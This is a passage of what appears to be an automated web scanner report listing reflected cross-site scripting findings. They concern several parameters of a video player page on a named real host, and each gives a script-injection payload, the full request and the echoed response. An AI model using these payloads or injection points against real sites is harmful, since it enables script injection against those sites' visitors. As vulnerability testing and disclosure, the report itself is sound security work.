9&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=013481</script><script>alert(1)</script>3a8131221a8&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvid
...[SNIP]...

2.530. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bFinish parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the bFinish request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9769e</script><script>alert(1)</script>77759cae366 was submitted in the bFinish parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=19769e</script><script>alert(1)</script>77759cae366&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:29 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
SessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=19769e</script><script>alert(1)</script>77759cae366&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&pla
...[SNIP]...

2.531. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bgColor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the bgColor request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eebc"><script>alert(1)</script>987d0864e9b was submitted in the bgColor parameter. This input was echoed as 1eebc\"><script>alert(1)</script>987d0864e9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=0000001eebc"><script>alert(1)</script>987d0864e9b&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:08 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8753

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<body style="background:#0000001eebc\"><script>alert(1)</script>987d0864e9b;">
...[SNIP]...

2.532. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bgColor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the bgColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8eae6</script><script>alert(1)</script>c4f734a3b63 was submitted in the bgColor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=0000008eae6</script><script>alert(1)</script>c4f734a3b63&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:13 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8777

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
0,0',
                               'width', 346,
                               'height',297,
                               'align','left',
                               'src','App/InfinityPlayer/Flash/presentationPlayer?rand=1',
                               'quality','high',
                               'bgcolor', '#0000008eae6</script><script>alert(1)</script>c4f734a3b63',
                               'allowscriptaccess','always',
                               'allowfullscreen','true',
                               'pluginspage','http://www.macromedia.com/go/getflashplayer',
                               'wmode','transparent'
                               , 'flashvars'
...[SNIP]...

2.533. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the cStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e4b</script><script>alert(1)</script>c8187299e75 was submitted in the cStyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5f1e4b</script><script>alert(1)</script>c8187299e75&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:30 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8777

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
               = navigator.userAgent.toLowerCase();
var allowFullScreen            = "1";
var allowStf                = "0";
var assetColor                = "";
var assetLoadedTimeout;
var controlsType            = "internal";
var cStyle                    = "5f1e4b</script><script>alert(1)</script>c8187299e75";
var defaultLeftMargin        = 0;
var domain                    = "http://iad.bigpondvideo.com/";
var initParams;
var InternetExplorer        = navigator.appName.indexOf("Microsoft") != -1;
var isError                    = false;
va
...[SNIP]...

2.534. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the cStyle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b457"><script>alert(1)</script>b186210ef6 was submitted in the cStyle parameter. This input was echoed as 1b457\"><script>alert(1)</script>b186210ef6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=51b457"><script>alert(1)</script>b186210ef6&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:26 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8749

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<script type="text/javascript" src="App/InfinityPlayer/Js/silverlight_controls_51b457\"><script>alert(1)</script>b186210ef6_sml.js?rand=1" >
...[SNIP]...

2.535. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the cStyle request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621e0</script><script>alert(1)</script>3603979df9f was submitted in the cStyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5621e0</script><script>alert(1)</script>3603979df9f&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:36 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8777

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
               , 'flashvars','randFlashId=43&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5621e0</script><script>alert(1)</script>3603979df9f&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&wind
...[SNIP]...

2.536. http://iad.bigpondvideo.com/indexInfinityPlayer.php [controls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the controls request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 684e9</script><script>alert(1)</script>6557bf3be13 was submitted in the controls parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal684e9</script><script>alert(1)</script>6557bf3be13&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:02 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8719

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
/javascript">
var ua                        = navigator.userAgent.toLowerCase();
var allowFullScreen            = "1";
var allowStf                = "0";
var assetColor                = "";
var assetLoadedTimeout;
var controlsType            = "internal684e9</script><script>alert(1)</script>6557bf3be13";
var cStyle                    = "5";
var defaultLeftMargin        = 0;
var domain                    = "http://iad.bigpondvideo.com/";
var initParams;
var InternetExplorer        = navigator.appName.indexOf("Microsoft") != -1;
var i
...[SNIP]...

2.537. http://iad.bigpondvideo.com/indexInfinityPlayer.php [controls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the controls request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edce3</script><script>alert(1)</script>3f649bd5bf8 was submitted in the controls parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internaledce3</script><script>alert(1)</script>3f649bd5bf8&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:07 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8719

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internaledce3</script><script>alert(1)</script>3f649bd5bf8&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/Infinit
...[SNIP]...

2.538. http://iad.bigpondvideo.com/indexInfinityPlayer.php [domain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the domain request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4804</script><script>alert(1)</script>9cb378d7e3b was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.comd4804</script><script>alert(1)</script>9cb378d7e3b&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:27 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.comd4804</script><script>alert(1)</script>9cb378d7e3b&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacOs&showOverlays=1&debug=0'+"&screenWidth="+screen.width+"&screenHeight="+screen.height); //end AC code

...[SNIP]...

2.539. http://iad.bigpondvideo.com/indexInfinityPlayer.php [environment parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the environment request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4900</script><script>alert(1)</script>29e14056bb3 was submitted in the environment parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
